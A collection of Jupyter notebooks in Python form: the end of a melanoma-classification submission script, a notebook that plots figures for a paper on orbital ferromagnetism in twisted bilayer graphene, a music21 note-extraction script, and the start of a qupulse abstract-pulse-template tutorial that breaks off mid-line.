plt.hist(submission['target'], bins=100) plt.show() fig = plt.subplots(figsize=(20, 5)) plt.hist(submission['target_last'], bins=100) plt.show() # - # # Test set predictions # + _kg_hide-input=true submission['target_blend'] = (submission['target'] * .5) + (submission['target_last'] * .5) display(submission.head(10)) display(submission.describe().T) ### BEST ### submission[['image_name', 'target']].to_csv('submission.csv', index=False) ### LAST ### submission_last = submission[['image_name', 'target_last']] submission_last.columns = ['image_name', 'target'] submission_last.to_csv('submission_last.csv', index=False) ### BLEND ### submission_blend = submission[['image_name', 'target_blend']] submission_blend.columns = ['image_name', 'target'] submission_blend.to_csv('submission_blend.csv', index=False)
Model backlog/Train/115-melanoma-5fold-efficientnetb6-256-malig-2020.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Introduction # This Jupyter notebook loads data and generates figures from: # # **Evidence of orbital ferromagnetism in twisted bilayer graphene aligned to hexagonal boron nitride** # # Authors: <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME> import sys print(sys.version) # # Initialization import json from cycler import cycler import numpy as np import matplotlib.pyplot as plt # %matplotlib inline # + # Set default plotting parameters plt.rcParams['axes.prop_cycle'] = cycler( color=['#E24A33', '#348ABD', '#988ED5', '#777777', '#FBC15E', '#8EBA42', '#FFB5B8']) plt.rcParams['axes.linewidth'] = 1 plt.rcParams['xtick.direction'] = 'in' plt.rcParams['xtick.top'] = 'True' plt.rcParams['xtick.major.size'] = 5 plt.rcParams['xtick.major.width'] = 1 plt.rcParams['xtick.minor.size'] = 2.5 plt.rcParams['xtick.minor.width'] = 1 plt.rcParams['ytick.direction'] = 'in' plt.rcParams['ytick.right'] = 'True' plt.rcParams['ytick.major.size'] = 5 plt.rcParams['ytick.major.width'] = 1 plt.rcParams['ytick.minor.size'] = 2.5 plt.rcParams['ytick.minor.width'] = 1 plt.rcParams['lines.linewidth'] = 1.5 plt.rcParams['font.size'] = 12 plt.rcParams['axes.labelsize'] = 12 # - # # Load data # + def import_data(file): with open(file, 'r') as f: json_load = json.load(f) return json_load fig1 = import_data('data/fig1.json') fig2 = import_data('data/fig2.json') fig3 = import_data('data/fig3.json') figs2 = import_data('data/figs2.json') figs3 = import_data('data/figs3.json') figs4 = import_data('data/figs4.json') figs5a = import_data('data/figs5a.json') figs5b = import_data('data/figs5b.json') figs6 = import_data('data/figs6.json') figs7 = import_data('data/figs7.json') figs8 = import_data('data/figs8.json') # - # # Figure 1 # **Angular dependence of magnetic hysteresis loops.** # # Magnetic field dependence of the Hall resistance $R_{yx}$ with $n/n_s = 0.746$ and $D/\epsilon_0 = -0.30\ \mathrm{V/nm}$ at $29\ \mathrm{mK}$ as a function of the angle of the device relative to the field direction; $0^\circ$ corresponds to field in the plane of the sample. The hysteresis loops are plotted as a function of (a) the applied field $B$ and (b) the component of the field perpendicular to the plane of the sample $B_\perp$. # The solid and dashed lines correspond to sweeping the magnetic field $B$ up and down, respectively. Inset: schematic diagram displaying the components of the magnetic field $B$ at the sample (shown in purple) for a given tilt angle $\theta$ # ## 1A # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, theta in enumerate(fig1['thetas_deg']): plt.plot(fig1['dn_B'][i], fig1['dn_ryx'][i], color=col(i/len(fig1['thetas_deg'])), label=fig1['labels'][i]) plt.plot(fig1['up_B'][i], fig1['up_ryx'][i], color=col(i/len(fig1['thetas_deg'])), linestyle='--') plt.xlim(-8, 8) plt.ylim(-8, 9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') plt.savefig('figures/fig1a.pdf', bbox_inches='tight', transparent=True) # - # ## 1B # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, theta in enumerate(fig1['thetas_deg']): plt.plot(np.sin(fig1['thetas'][i])*np.array(fig1['dn_B'][i]), fig1['dn_ryx'][i], color=col(i/len(fig1['thetas_deg'])), label=fig1['labels'][i]) plt.plot(np.sin(fig1['thetas'][i])*np.array(fig1['up_B'][i]), fig1['up_ryx'][i], color=col(i/len(fig1['thetas_deg'])), linestyle='--') ax.text(0.05, 0.095+0.085*i, fig1['labels'][i], transform=ax.transAxes, fontsize=7, va='top', ha='left', color=col(i/(len(fig1['thetas_deg'])))) plt.xlim(-1.6, 1.6) plt.ylim(-9, 9) plt.xlabel(r'$B_{\mathrm{\perp}}\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') plt.savefig('figures/fig1b.pdf', bbox_inches='tight', transparent=True) # - # # Figure 2 # **Hysteresis loops for small tilt angles.** # # Angular dependence of $R_{yx}$ vs $B$ with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ for angles of the field relative to the plane of the sample: (a) $4.71^\circ \pm 0.10^\circ$, (b) $1.82^\circ \pm 0.10^\circ$, (c) $0.85^\circ \pm 0.10^\circ$, (d) $+0.223^\circ \pm 0.049^\circ$, and $-0.171^\circ \pm 0.025^\circ$. Vertical dashed black lines indicate where the out-of-plane component of the field equals the coercive field $\pm 119\ \mathrm{mT}$. The out-of-plane component of the field is raised beyond the coercive field in panels (a),(b), just reaches the coercive field in (c), and does not reach it in (d). All traces were taken at $27\ \mathrm{mK}$ except for the trace with tilt angle $+0.223^\circ \pm 0.049^\circ$, which was taken at $1.35\ \mathrm{K}$. # ## 2A # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 0 plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind]) plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(-9, 9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') Bc = 0.119 theta = 4.71*np.pi/180 plt.axvline( Bc/np.sin(theta), ymin=0.0, ymax=0.7, color='k', linestyle='--', alpha=0.8) plt.axvline(-Bc/np.sin(theta), ymin=0.15, ymax=0.93, color='k', linestyle='--', alpha=0.8) plt.savefig('figures/fig2a.pdf', bbox_inches='tight', transparent=True) # - # ## 2B # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 1 plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind]) plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(-9, 9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') Bc = 0.119 theta = 1.82*np.pi/180 plt.axvline( Bc/np.sin(theta), ymin=0.0, ymax=0.4, color='k', linestyle='--', alpha=0.8) plt.axvline(-Bc/np.sin(theta), ymin=0.4, ymax=0.8, color='k', linestyle='--', alpha=0.8) plt.savefig('figures/fig2b.pdf', bbox_inches='tight', transparent=True) # - # ## 2C # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 2 plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind]) plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(-9, 9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') plt.savefig('figures/fig2c.pdf', bbox_inches='tight', transparent=True) # - # ## 2D # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 3 plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind]) plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--') ind = 4 plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C1', label=fig2['labels'][ind]) plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C1', linestyle='--') plt.xlim(-8, 8) plt.ylim(-9, 9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ind = 3 ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') ind = 4 ax.text(0.60, 0.815, fig2['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C1') plt.savefig('figures/fig2b.pdf', bbox_inches='tight', transparent=True) # - # # Figure 3 # **Erasing the initial magnetic state.** # # In-plane hysteresis loops of $R_{yx}$ with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ at $26\ \mathrm{mK}$. The sample is initially polarized with an out-of-plane field. The sample is then rotated to $-57 \pm 21\ \mathrm{mdeg}$ in zero magnetic field. The in-plane magnetic field $B_{\parallel}$ is then increased from zero (red trace) before completing a hysteresis loop (blue solid and dashed traces). # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][0]), fig3['dn_ryx'][0], label='Initial sweep up') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][1]), fig3['dn_ryx'][1], color='C0') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['up_B'][0]), fig3['up_ryx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][2]), fig3['dn_ryx'][2], color='C1', label='Sweep up') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][3]), fig3['dn_ryx'][3], color='C1') plt.xlim(-14, 14) plt.ylim(-8.5, 6.5) plt.xlabel(r'$B_{||}\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') plt.legend(fontsize=10, frameon=False, loc='lower left') plt.savefig('figures/fig3_raw.pdf', bbox_inches='tight', transparent=True) # - # # Figure S2 # **Angular dependence of longitudinal Resistance in magnetic hysteresis loops.** # # Magnetic field dependence of the longitudinal resistance $R_{xx}$ corresponding to the data shown in Fig. 1 of the main text, with $n/n_s = 0.746$ and $D/\epsilon_0 = -0.30\ \mathrm{V/nm}$ at $29\ \mathrm{mK}$ as a function of the angle of the device relative to the field direction; $0^\circ$ corresponds to field in the plane of the sample. The hysteresis loops are plotted as a function of (a) the applied field $B$ and (b) the component of the field perpendicular to the plane of the sample $B_\perp$. The solid and dashed lines correspond to sweeping the magnetic field $B$ up and down, respectively. # ## S2A # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, theta in enumerate(figs2['thetas_deg']): plt.plot(figs2['dn_B'][i], figs2['dn_rxx'][i], color=col(i/len(figs2['thetas_deg'])), label=figs2['labels'][i]) plt.plot(figs2['up_B'][i], figs2['up_rxx'][i], color=col(i/len(figs2['thetas_deg'])), linestyle='--') plt.xlim(-8, 8) plt.ylim(-2, 19.9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') plt.savefig('figures/figs2a.pdf', bbox_inches='tight', transparent=True) # - # ## S2B # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, theta in enumerate(figs2['thetas_deg']): plt.plot(np.sin(figs2['thetas'][i])*np.array(figs2['dn_B'][i]), figs2['dn_rxx'][i], color=col(i/len(figs2['thetas_deg'])), label=figs2['labels'][i]) plt.plot(np.sin(figs2['thetas'][i])*np.array(figs2['up_B'][i]), figs2['up_rxx'][i], color=col(i/len(figs2['thetas_deg'])), linestyle='--') ax.text(0.70, 0.095+0.085*i, figs2['labels'][i], transform=ax.transAxes, fontsize=7, va='top', ha='left', color=col(i/(len(figs2['thetas_deg'])))) plt.xlim(-1.6, 1.6) plt.ylim(-2, 19.9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') plt.savefig('figures/figs2a.pdf', bbox_inches='tight', transparent=True) # - # # Figure S3 # **Longitudinal resistance hysteresis loops for nearly in-plane fields.** # # Angular dependence of the longitudinal resistance $R_{xx}$ vs $B$ corresponding to the data shown in Fig.~2 of the main text with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ for angles of the field relative to the plane of the sample: (a) $4.71^\circ \pm 0.10^\circ$, (b) $1.82^\circ \pm 0.10^\circ$, (c) $0.85^\circ \pm 0.10^\circ$, (d) $+0.223^\circ \pm 0.049^\circ$, and $-0.171^\circ \pm 0.025^\circ$. Vertical dashed black lines indicate where the out-of-plane component of the field equals the coercive field $\pm 119\ \mathrm{mT}$. The out-of-plane component of the field is raised beyond the coercive field in panels (a),(b), just reaches the coercive field in (c), and does not reach it in (d). All traces were taken at $27\ \mathrm{mK}$ except for the trace with tilt angle $+0.223^\circ \pm 0.049^\circ$, which was taken at $1.35\ \mathrm{K}$. # ## S3A # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 0 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.05, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') Bc = 0.119 theta = 4.71*np.pi/180 plt.axvline( Bc/np.sin(theta), ymin=0.3, ymax=0.92, color='k', linestyle='--', alpha=0.8) plt.axvline(-Bc/np.sin(theta), ymin=0.00, ymax=0.7, color='k', linestyle='--', alpha=0.8) plt.savefig('figures/figs3a.pdf', bbox_inches='tight', transparent=True) # - # ## S3B # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 1 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.05, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') Bc = 0.119 theta = 1.82*np.pi/180 plt.axvline( Bc/np.sin(theta), ymin=0.3, ymax=0.92, color='k', linestyle='--', alpha=0.8) plt.axvline(-Bc/np.sin(theta), ymin=0.00, ymax=0.7, color='k', linestyle='--', alpha=0.8) plt.savefig('figures/figs3b.pdf', bbox_inches='tight', transparent=True) # - # ## S3C # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 2 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.05, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') plt.savefig('figures/figs3c.pdf', bbox_inches='tight', transparent=True) # - # ## S3D # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 3 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') ind = 4 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C1', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C1', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') ind = 3 ax.text(0.60, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') ind = 4 ax.text(0.60, 0.815, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C1') plt.savefig('figures/figs3d.pdf', bbox_inches='tight', transparent=True) # - # # Figure S4 # **Longitudinal resistance under an in-plane field from an initially magnetized state.** # # In-plane hysteresis loops of the (a) longitudinal resistance $R_{xx}$ corresponding to the data shown in Fig. 3 of the main text with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ at $26\ \mathrm{mK}$. The Hall resistance data $R_{yx}$ of Fig. 3 of the main text are replicated in panel (b). The sample is initially polarized with an out-of-plane field. The sample is then rotated to $-57 \pm 21 \mathrm{mdeg}$ in zero magnetic field. The field $B_{\parallel}$ is then increased from zero (red trace) before completing a hysteresis loop (blue solid and dashed traces). # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][0]), figs4['dn_rxx'][0], label='Initial sweep up') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][1]), figs4['dn_rxx'][1], color='C0') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['up_B'][0]), figs4['up_rxx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][2]), figs4['dn_rxx'][2], color='C1', label='Sweep up') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][3]), figs4['dn_rxx'][3], color='C1') plt.xlim(-14, 14) plt.xlabel(r'$B_{||}\ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') plt.legend(fontsize=10, frameon=False, loc='upper left') plt.savefig('figures/figs4a.pdf', bbox_inches='tight', transparent=True) # - # # Figure S5 # **Assymmetric contribution of the Hall resistance under an in-plane field.** # # (a) Antisymmetric component of the Hall resistance $R_{yx}^{\mathrm{asym}}$ corresponding to the Hall data shown in Fig. 3 of the main text. $\pm R_{yx}^{\mathrm{asym}}$ is plotted as a solid (dashed) line. For $8\ \mathrm{T}$ and above (indicated by the large tick on the horizontal axis), we report $R_{yx}^{\mathrm{asym}}$ for the initial sweep up and the sweep down. Otherwise we report $R_{yx}^{\mathrm{asym}}$ for the sweep down and the sweep up (which was only completed up to $8\ \mathrm{T}$.) (b) Antisymmetric component of the Hall resistance $R_{yx}^{\mathrm{asym}}$ for the nearly out-of-plane hysteresis loop performed at $87.6^\circ \pm 1.0^\circ$, shown in Fig. 1 of the main text. (c) Schematic diagram of the symmetrization process for an ideal hysteresis loop that is offset from zero in the vertical direction. # ## S5A # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(figs5a['B_asym'], figs5a['ryx_asym'], 'C1') plt.plot(figs5a['B_asym'], -np.array(figs5a['ryx_asym']), '--C1') plt.plot(figs5a['B_asym_lo'], figs5a['ryx_asym_lo'], 'C1') plt.plot(figs5a['B_asym_lo'], -np.array(figs5a['ryx_asym_lo']), '--C1') plt.plot(figs5a['B_asym_hi'], figs5a['ryx_asym_hi'], 'C1') plt.plot(figs5a['B_asym_hi'], -np.array(figs5a['ryx_asym_hi']), '--C1') ax.text(0.65, 0.93, r'$-57 \pm 21\ \mathrm{mdeg}$', transform=ax.transAxes, fontsize=7, va='top', ha='left', color='C1') plt.xlim(-14, 14) plt.xlabel(r'$B_{\mathrm{||}} \ (\mathrm{T})$') plt.ylabel(r'$R_{yx}^{\mathrm{asym}}\ (\mathrm{k\Omega})$') plt.axvline(8, ymin=0, ymax=0.1, color='k', linewidth=1) plt.savefig('figures/figs5a.pdf', bbox_inches='tight', transparent=True) # - # ## S5B # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(figs5b['B_asym'], figs5b['ryx_asym'], 'C1') plt.plot(-np.array(figs5b['B_asym']), -np.array(figs5b['ryx_asym']), '--C1') ax.text(0.70, 0.93, r'$87.6^\circ \pm 1.0^\circ$', transform=ax.transAxes, fontsize=7, va='top', ha='left', color='C1') plt.xlim(-8, 8) plt.xlabel(r'$B_{\perp} \ (\mathrm{T})$') plt.ylabel(r'$R_{yx}^{\mathrm{asym}}\ (\mathrm{k\Omega})$') plt.savefig('figures/figs5b.pdf', bbox_inches='tight', transparent=True) # - # # Figure S6 # **Dependence on the magnitude of the in-plane field.** # # In-plane hysteresis loops of corresponding longitudinal resistance $R_{xx}$ to the data shown in Fig. 3 of the main text with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ at $26\ \mathrm{mK}$. The sample is initially polarized with an out-of-plane field. The sample is then rotated to $-57 \pm 21\ \mathrm{mdeg}$ in zero magnetic field. The field $B_{\parallel}$ is then increased from zero (red trace) before completing a hysteresis loop (blue traces). Though the absolute resistance is offset between the two panels, as seen in the vertical axis labels, the size of the resistance range is the same in both panels. # ## S6A # + fig, ax = plt.subplots(figsize = (2*1.618, 2)) fig.patch.set_facecolor('white') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][0]), figs6['dn_rxx'][0], label='Initial sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][1]), figs6['dn_rxx'][1], color='C0') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['up_B'][0]), figs6['up_rxx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][2]), figs6['dn_rxx'][2], color='C1', label='Sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][3]), figs6['dn_rxx'][3], color='C1') plt.xlim(6,14) plt.ylim(7.75, 10.75) plt.xlabel(r'$| B_{\mathrm{||}}| \ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') plt.legend(fontsize=7, frameon=False,loc='upper right') plt.savefig('figures/figs6a.pdf', bbox_inches='tight', transparent=True) # - # ## S6B # + fig, ax = plt.subplots(figsize = (2*1.618, 2)) fig.patch.set_facecolor('white') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][0]), figs6['dn_ryx'][0], label='Initial sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][1]), figs6['dn_ryx'][1], color='C0') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['up_B'][0]), figs6['up_ryx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][2]), figs6['dn_ryx'][2], color='C1', label='Sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][3]), figs6['dn_ryx'][3], color='C1') plt.xlim(6,14) plt.ylim(-0.25, 2.75) plt.xlabel(r'$|B_{||}|\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') plt.savefig('figures/figs6b.pdf', bbox_inches='tight', transparent=True) # - # # Figure S7 # **Hysteresis loops at small angles.** # # Magnetic field hysteresis loops where $R_{yx}$ is measured at two small angles of very different magnitude and likely opposite sign: $+172 \pm 29\ \mathrm{mdeg}$ in red and $-17 \pm 22\ \mathrm{mdeg}$ in blue. Both traces were taken at $28\ \mathrm{mK}$ with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$. The sample has been rotated in the plane by an angle of $20^\circ$ relative to the measurements performed in Fig. 2 of the main text. # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') ind = 0 plt.plot(figs7['dn_B'][ind], figs7['dn_ryx'][ind], color='C0', label=figs7['labels'][ind]) plt.plot(figs7['up_B'][ind], figs7['up_ryx'][ind], color='C0', linestyle='--') ind = 1 plt.plot(figs7['dn_B'][ind], figs7['dn_ryx'][ind], color='C1', label=figs7['labels'][ind]) plt.plot(figs7['up_B'][ind], figs7['up_ryx'][ind], color='C1', linestyle='--') plt.xlim(-7,7) plt.ylim(-9,9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ind = 0 ax.text(0.60, 0.915, figs7['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') ind = 1 ax.text(0.60, 0.815, figs7['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C1') plt.savefig('figures/figs7.pdf', bbox_inches='tight', transparent=True) # - # # Figure S8 # **In-plane field dependence of longitudinal resistance.** # # Longitudinal resistance $R_{xx}$ as a function of carrier density $n$ for several different in-plane magnetic fields at a fixed displacement field of $D/\epsilon_0 = -0.30\ \mathrm{V/nm}$ and $1.2\ \mathrm{K}$ for a tilt angle of $-62 \pm 23\ \mathrm{mdeg}$. # + fig, ax = plt.subplots(figsize = (4*1.618,4)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, _ in enumerate(figs8['labels']): fig = plt.semilogy(figs8['nu'][i], figs8['rxx'][i], color=col(i/len(figs8['labels']))) ax.text(0.25, 0.425 + 0.075*i, figs8['labels'][i], transform=ax.transAxes, fontsize=10, va='top', ha='left', color=col(i/len(figs8['labels']))) plt.xlabel(r'$n/\,n_s$') plt.ylabel(r'$R_{xx}\ (\mathrm{\Omega})$') plt.xlim(-1.4,1.4) plt.ylim(300,400000) plt.savefig('figures/figs8.pdf', bbox_inches='tight', transparent=True) # -
evidence of orbital ferromagnetism in twisted bilayer graphene aligned to hexagonal boron nitride/tbg_rot_figures.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: DeepLearning # language: python # name: deeplearning # --- # Music processing from music21 import * # Algorithms from itertools import takewhile # File management import os from glob import glob from pathlib import Path import csv # ## Settings # Set the path to training file directory corpus_path = 'C:\\Users\\alext\\Desktop\\School\\2021 Spring\\CS 271\\Final Project\\Feature Extraction\\Music Corpus' # Set the path to store the extracted features export_path = 'C:\\Users\\alext\\Desktop\\School\\2021 Spring\\CS 271\\Final Project\\Feature Extraction\\Music Features' # ## Convert Music Files Into Features def extract_features(path, file_name): # Construct the full path of the music file file_path = os.path.join(path, file_name); # Parse the file and convert it into a stream object score_stream = converter.parse(file_path) # Get an iterator of all notes and chords in the score note_stream = score_stream.flat.notes # note_iter = stream.notesAndRests # An orderd list of the notes in the song features = [] # Keep looping through the stream until the end of the enumeration for phrase in takewhile(lambda x: True, note_stream): # A single note if type(phrase) is note.Note: features.append([phrase.pitch.midi]) # A chord elif type(phrase) is chord.Chord: pitches = phrase.pitches midi_pitches = map(lambda x: x.midi, pitches) features.append(list(midi_pitches)) return features # ## Export a List of Features to a CSV File def export_features(path, file_name, features): # Change the file extention file_name = file_name[:-3] + 'csv' # Construct the full path of the target feature file file_path = os.path.join(path, file_name); # Write the features list to a csv file with open(file_path, 'w') as feature_file: write = csv.writer(feature_file) write.writerows(features) # ## Extract Features from all Training Files # + # Go to the training file directory os.chdir(corpus_path) # Get a list of all mxl files in the directory music_files = glob('*.mxl') + glob('*.mid') + glob('*.midi') print("Extraxting...") # Extract the features for each score for file_name in music_files: features = extract_features(corpus_path, file_name) export_features(export_path, file_name, features) print("Finished")
Tests/Music Note Extraction Test.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Abstract Pulse Template # This pulse template can be used as a place holder for a pulse template with a defined interface. Pulse template properties like `defined_channels` can be passed on initialization to declare those properties who make up the interface. Omitted properties raise an `NotSpecifiedError` exception if accessed. Properties which have been accessed are marked as "frozen". # The abstract pulse template can be linked to another pulse template by calling the `link_to` member. The target has to have the same properties for all properties marked as "frozen". This ensures a property always returns the same value. # + from qupulse.pulses import AbstractPT, FunctionPT, AtomicMultiChannelPT, PointPT init = PointPT([(0, (1, 0)), ('t_init', (0, 1), 'linear')], ['X', 'Y']) abstract_readout = AbstractPT('readout', defined_channels={'X', 'Y'}, integral={'X': 1, 'Y': 'a*b'}) manip = AtomicMultiChannelPT(FunctionPT('sin(t)', 't_manip', channel='X'), FunctionPT('cos(t)', 't_manip', channel='Y')) experiment = init @ manip @ abstract_readout # - # We can access declared properties like integral. If we try to get a non-declared property an exception is raised. # + print('The integral has been declared so we can get it') print(experiment.integral) print() import traceback try: experiment.duration except Exception as err: print('We get an error that for the pulse "readout" the property "duration" was not specified:') print(repr(err)) # - # We can link the abstract pulse template to an actual pulse template. By accessing the integral property above we froze it. Linking a pulse with a different property will result in an error. # + my_readout_wrong_integral = AtomicMultiChannelPT(FunctionPT('1', 't_read', channel='X'), FunctionPT('a*b', 't_read', channel='Y')) my_readout = AtomicMultiChannelPT(FunctionPT('1 / 